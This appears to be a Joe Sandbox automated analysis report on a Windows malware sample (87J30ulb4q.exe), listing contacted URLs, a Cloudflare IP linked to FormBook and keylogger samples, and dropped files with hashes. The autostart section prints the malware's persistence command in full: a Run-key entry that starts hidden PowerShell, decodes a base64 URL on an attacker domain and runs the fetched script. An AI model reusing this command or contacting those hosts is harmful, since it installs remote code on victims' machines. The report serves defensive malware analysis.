Name | Malicious | Antivirus Detection | Reputation
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM | false | Avira URL Cloud: safe | unknown
https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B7544A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 0000000C.00000002.1476730296.00000238B6455000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000008.00000002.1308266474.0000000004D9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B753BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B8FCD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://zjhy.coimbratratadores.comd | 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lBeq | powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg | 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.c | powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://zjhy.coimbratratadores.com | 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B99CD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://zjhy.coimbratratadores.com | 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A62000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP:104.21.96.1
Domain:zjhy.coimbratratadores.com
Country:United States
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:false
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588179
                                  Start date and time:2025-01-10 22:20:49 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:87J30ulb4q.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867.exe
                                  Detection:MAL
                                  Classification:mal100.evad.winEXE@8/12@1/1
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 24
                                  • Number of non-executed functions: 7
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
Time:16:21:43
Type:API Interceptor
Description:47x Sleep call for process: powershell.exe modified
Time:16:21:47
Type:API Interceptor
Description:1x Sleep call for process: 87J30ulb4q.exe modified
Time:22:21:41
Type:Autostart
Description:Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Time:22:21:49
Type:Autostart
Description:Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Match:104.21.96.1
Associated Sample Name / URL:EIvidclKOb.exe
Detection:malicious
Threat Name:FormBook
Context:
• www.mffnow.info/0pqe/
Associated Sample Name / URL:zE1VxVoZ3W.exe
Detection:malicious
Threat Name:FormBook
Context:
• www.aonline.top/fqlg/
Associated Sample Name / URL:QUOTATION#070125-ELITE MARINE .exe
Detection:malicious
Threat Name:FormBook
Context:
• www.mzkd6gp5.top/3u0p/
Associated Sample Name / URL:SH8ZyOWNi2.exe
Detection:malicious
Threat Name:CMSBrute
Context:
• pelisplus.so/administrator/index.php
Associated Sample Name / URL:Recibos.exe
Detection:malicious
Threat Name:FormBook
Context:
• www.mffnow.info/1a34/
                                  No context
Match:CLOUDFLARENETUS
Associated Sample Name / URL:lsc5QN46NH.exe
Detection:malicious
Threat Name:Snake Keylogger, VIP Keylogger
Context:
• 104.21.80.1
Associated Sample Name / URL:V7OHj6ISEo.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.32.1
Associated Sample Name / URL:https://services221.com/mm/
Detection:malicious
Threat Name:HTMLPhisher
Context:
• 104.17.25.14
Associated Sample Name / URL:https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f
Detection:malicious
Threat Name:HTMLPhisher
Context:
• 104.17.25.14
Associated Sample Name / URL:https://www.shinsengumiusa.com/mrloskie
Detection:malicious
Threat Name:Unknown
Context:
• 188.114.96.3
Associated Sample Name / URL:https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f
Detection:malicious
Threat Name:HTMLPhisher
Context:
• 104.17.25.14
Associated Sample Name / URL:https://payhip.com/b/J12iX/purchased
Detection:malicious
Threat Name:Unknown
Context:
• 104.17.25.14
Associated Sample Name / URL:upXUt2jZ0S.exe
Detection:malicious
Threat Name:Snake Keylogger
Context:
• 104.21.48.1
Associated Sample Name / URL:jG8N6WDJOx.exe
Detection:malicious
Threat Name:AgentTesla
Context:
• 104.26.13.205
Associated Sample Name / URL:2CQ2zMn0hb.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.16.1
Match:3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL:lsc5QN46NH.exe
Detection:malicious
Threat Name:Snake Keylogger, VIP Keylogger
Context:
• 104.21.96.1
Associated Sample Name / URL:V7OHj6ISEo.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:jG8N6WDJOx.exe
Detection:malicious
Threat Name:AgentTesla
Context:
• 104.21.96.1
Associated Sample Name / URL:2CQ2zMn0hb.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:6mGpn6kupm.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:SABXJ1B5c8.exe
Detection:malicious
Threat Name:MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:v4nrZtP7K2.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:xXUnP7uCBJ.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
Associated Sample Name / URL:HGhGAjCVw5.exe
Detection:malicious
Threat Name:AgentTesla
Context:
• 104.21.96.1
Associated Sample Name / URL:4UQ5wnI389.exe
Detection:malicious
Threat Name:GuLoader, MassLogger RAT
Context:
• 104.21.96.1
                                  No context
                                  Process:C:\Users\user\Desktop\87J30ulb4q.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1161
                                  Entropy (8bit):5.343102427125717
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KlKDE4KhKiKhg84qpsXE4qdKtKIE4oKNzKoZAE4KzeR:MxHKlYHKh3ogvpH7tHo6hAHKzeR
                                  MD5:183BA07675E72658AF39483A11CE12AA
                                  SHA1:BDDF0D97547B884DF8CA74260B3ACAC0B91A4A3D
                                  SHA-256:6A8588FF2861266EC2B680ED010A2D1F34836008EA23FF7B10E7D72A02ADF297
                                  SHA-512:B3A742057FC63788BB504F13D9C9BE34A38ED29F85B095D9881B2F8F555FFBD1F49844E68EBC911245B3ADF0D40B15F9E93E356BB351CA532E71FE51542AEF1C
                                  Malicious:true
                                  Reputation:low
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Cul
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7217635673850795
                                  Encrypted:false
                                  SSDEEP:48:ZfYCfZCl3CvU2UZVjwukvhkvklCywflYF/lxASogZopFFYF/l+ASogZoP1:e2CNCsNZVdkvhkvCCtNYF/FHaYF/IHM
                                  MD5:23A7C986ECB8359A1D1216844819DD85
                                  SHA1:BA3C8C05A49B96917BBB2FEFF4C18AE5DAB5F996
                                  SHA-256:1B67986CEB46AEB00315440C1E6FA64B10243FAF3AB34666C0C0D7449D521EEC
                                  SHA-512:886E108157BB7F944F682513779657132D5C7154AB2514244C422640D6E1CD30C46AADA01B4B4E3D66CA41D639FC79FB1333EB05B0E74A0E7DAE179992ED20E9
                                  Malicious:false
